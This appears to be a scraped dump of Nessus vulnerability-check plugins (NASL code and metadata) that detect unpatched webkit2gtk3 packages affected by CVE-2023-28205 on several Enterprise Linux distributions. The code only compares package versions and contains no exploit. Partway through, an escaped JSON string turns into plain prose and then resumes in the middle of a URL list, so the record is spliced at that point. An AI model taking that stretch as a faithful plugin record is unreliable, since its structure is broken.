{'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'i686', 
'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, 
reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:40:32", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "RHEL 8 : webkit2gtk3 (RHSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174592", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2023:1919. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174592);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n script_xref(name:\"RHSA\", value:\"2023:1919\");\n\n script_name(english:\"RHEL 8 : webkit2gtk3 (RHSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura\n 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited. 
(CVE-2023-28205). For Red Hat Enterprise Linux 8 the corresponding advisory is RHSA-2023:1919 (https://access.redhat.com/errata/RHSA-2023:1919), and the fixed packages are webkit2gtk3-2.36.7-1.el8_7.3 together with the webkit2gtk3-devel, webkit2gtk3-jsc and webkit2gtk3-jsc-devel subpackages of the same version. The Nessus plugin classifies the flaw as CWE-416 with CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, lists the vulnerability publication date as 2023/04/10 and the patch and plugin publication dates as 2023/04/20, and marks an exploit as available; it does not test for the issue itself but relies only on the self-reported package version.

Tenable published equivalent plugins for the other Enterprise Linux rebuilds. Each carries the same Apple description of CVE-2023-28205 (a use after free addressed with improved memory management, fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1 and macOS Ventura 13.3.1; processing maliciously crafted web content may lead to arbitrary code execution, and Apple is aware of a report that it may have been actively exploited), the cross-reference CISA-KNOWN-EXPLOITED 2023/05/01, and the same caveat that detection is based on the application's self-reported version number.

Oracle Linux 8 : webkit2gtk3 (ELSA-2023-1919), Nessus plugin 174573 (https://www.tenable.com/plugins/nessus/174573), published 2023-04-20 and last modified 2023-09-18. Advisory: https://linux.oracle.com/errata/ELSA-2023-1919.html. Fixed packages: webkit2gtk3-2.36.7-1.el8_7.3 and its -devel, -jsc and -jsc-devel subpackages, checked for the aarch64, i686 and x86_64 architectures.

AlmaLinux 9 : webkit2gtk3 (ALSA-2023:1918), Nessus plugin 174695 (https://www.tenable.com/plugins/nessus/174695), published 2023-04-25. Advisory: https://errata.almalinux.org/9/ALSA-2023-1918.html. Fixed packages: webkit2gtk3-2.36.7-1.el9_1.3 and its -devel, -jsc and -jsc-devel subpackages.

RHEL 9 : webkit2gtk3 (RHSA-2023:1918), Nessus plugin 174590 (https://www.tenable.com/plugins/nessus/174590), published 2023-04-20 and last modified 2023-05-24. Advisory: https://access.redhat.com/errata/RHSA-2023:1918. The check covers Red Hat Enterprise Linux 9 including the 9.2 AUS, E4S and EUS repositories.
'content/eus/rhel9/9.2/s390x/codeready-builder/os',\n 'content/eus/rhel9/9.2/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/highavailability/debug',\n 'content/eus/rhel9/9.2/s390x/highavailability/os',\n 'content/eus/rhel9/9.2/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/debug',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/os',\n 'content/eus/rhel9/9.2/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/sap/debug',\n 'content/eus/rhel9/9.2/s390x/sap/os',\n 'content/eus/rhel9/9.2/s390x/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/s390x/supplementary/debug',\n 'content/eus/rhel9/9.2/s390x/supplementary/os',\n 'content/eus/rhel9/9.2/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/appstream/debug',\n 'content/eus/rhel9/9.2/x86_64/appstream/os',\n 'content/eus/rhel9/9.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/baseos/debug',\n 'content/eus/rhel9/9.2/x86_64/baseos/os',\n 'content/eus/rhel9/9.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/os',\n 'content/eus/rhel9/9.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/highavailability/debug',\n 'content/eus/rhel9/9.2/x86_64/highavailability/os',\n 'content/eus/rhel9/9.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/os',\n 'content/eus/rhel9/9.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/os',\n 'content/eus/rhel9/9.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/sap/debug',\n 'content/eus/rhel9/9.2/x86_64/sap/os',\n 'content/eus/rhel9/9.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel9/9.2/x86_64/supplementary/debug',\n 'content/eus/rhel9/9.2/x86_64/supplementary/os',\n 
'content/eus/rhel9/9.2/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'sp':'2', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel9/9/aarch64/appstream/debug',\n 'content/dist/rhel9/9/aarch64/appstream/os',\n 'content/dist/rhel9/9/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/baseos/debug',\n 'content/dist/rhel9/9/aarch64/baseos/os',\n 'content/dist/rhel9/9/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/codeready-builder/debug',\n 'content/dist/rhel9/9/aarch64/codeready-builder/os',\n 'content/dist/rhel9/9/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/highavailability/debug',\n 'content/dist/rhel9/9/aarch64/highavailability/os',\n 'content/dist/rhel9/9/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/aarch64/supplementary/debug',\n 'content/dist/rhel9/9/aarch64/supplementary/os',\n 'content/dist/rhel9/9/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/appstream/debug',\n 'content/dist/rhel9/9/ppc64le/appstream/os',\n 'content/dist/rhel9/9/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/baseos/debug',\n 'content/dist/rhel9/9/ppc64le/baseos/os',\n 'content/dist/rhel9/9/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/debug',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/os',\n 'content/dist/rhel9/9/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/highavailability/debug',\n 'content/dist/rhel9/9/ppc64le/highavailability/os',\n 
'content/dist/rhel9/9/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/debug',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/os',\n 'content/dist/rhel9/9/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/debug',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/os',\n 'content/dist/rhel9/9/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/sap/debug',\n 'content/dist/rhel9/9/ppc64le/sap/os',\n 'content/dist/rhel9/9/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel9/9/ppc64le/supplementary/debug',\n 'content/dist/rhel9/9/ppc64le/supplementary/os',\n 'content/dist/rhel9/9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/s390x/appstream/debug',\n 'content/dist/rhel9/9/s390x/appstream/os',\n 'content/dist/rhel9/9/s390x/appstream/source/SRPMS',\n 'content/dist/rhel9/9/s390x/baseos/debug',\n 'content/dist/rhel9/9/s390x/baseos/os',\n 'content/dist/rhel9/9/s390x/baseos/source/SRPMS',\n 'content/dist/rhel9/9/s390x/codeready-builder/debug',\n 'content/dist/rhel9/9/s390x/codeready-builder/os',\n 'content/dist/rhel9/9/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/s390x/highavailability/debug',\n 'content/dist/rhel9/9/s390x/highavailability/os',\n 'content/dist/rhel9/9/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/s390x/resilientstorage/debug',\n 'content/dist/rhel9/9/s390x/resilientstorage/os',\n 'content/dist/rhel9/9/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/s390x/sap/debug',\n 'content/dist/rhel9/9/s390x/sap/os',\n 'content/dist/rhel9/9/s390x/sap/source/SRPMS',\n 'content/dist/rhel9/9/s390x/supplementary/debug',\n 'content/dist/rhel9/9/s390x/supplementary/os',\n 'content/dist/rhel9/9/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/appstream/debug',\n 'content/dist/rhel9/9/x86_64/appstream/os',\n 'content/dist/rhel9/9/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/baseos/debug',\n 
'content/dist/rhel9/9/x86_64/baseos/os',\n 'content/dist/rhel9/9/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/codeready-builder/debug',\n 'content/dist/rhel9/9/x86_64/codeready-builder/os',\n 'content/dist/rhel9/9/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/highavailability/debug',\n 'content/dist/rhel9/9/x86_64/highavailability/os',\n 'content/dist/rhel9/9/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/nfv/debug',\n 'content/dist/rhel9/9/x86_64/nfv/os',\n 'content/dist/rhel9/9/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/resilientstorage/debug',\n 'content/dist/rhel9/9/x86_64/resilientstorage/os',\n 'content/dist/rhel9/9/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/rt/debug',\n 'content/dist/rhel9/9/x86_64/rt/os',\n 'content/dist/rhel9/9/x86_64/rt/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap-solutions/debug',\n 'content/dist/rhel9/9/x86_64/sap-solutions/os',\n 'content/dist/rhel9/9/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/sap/debug',\n 'content/dist/rhel9/9/x86_64/sap/os',\n 'content/dist/rhel9/9/x86_64/sap/source/SRPMS',\n 'content/dist/rhel9/9/x86_64/supplementary/debug',\n 'content/dist/rhel9/9/x86_64/supplementary/os',\n 'content/dist/rhel9/9/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el9_1.3', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var 
repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / 
webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:41:55", "description": "The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-26T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : webkit2gtk3 (RLSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-26T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174801", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2023:1919.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174801);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/26\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"RLSA\", 
value:\"2023:1919\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Rocky Linux 8 : webkit2gtk3 (RLSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2023:1919\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=2185724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/26\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RockyLinux/release');\nif (isnull(os_release) || 'Rocky Linux' >!< os_release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? 
release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-debugsource-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if 
(!empty_or_null(package_array['release'])) _release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-debuginfo / webkit2gtk3-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-13T01:12:40", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5390 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
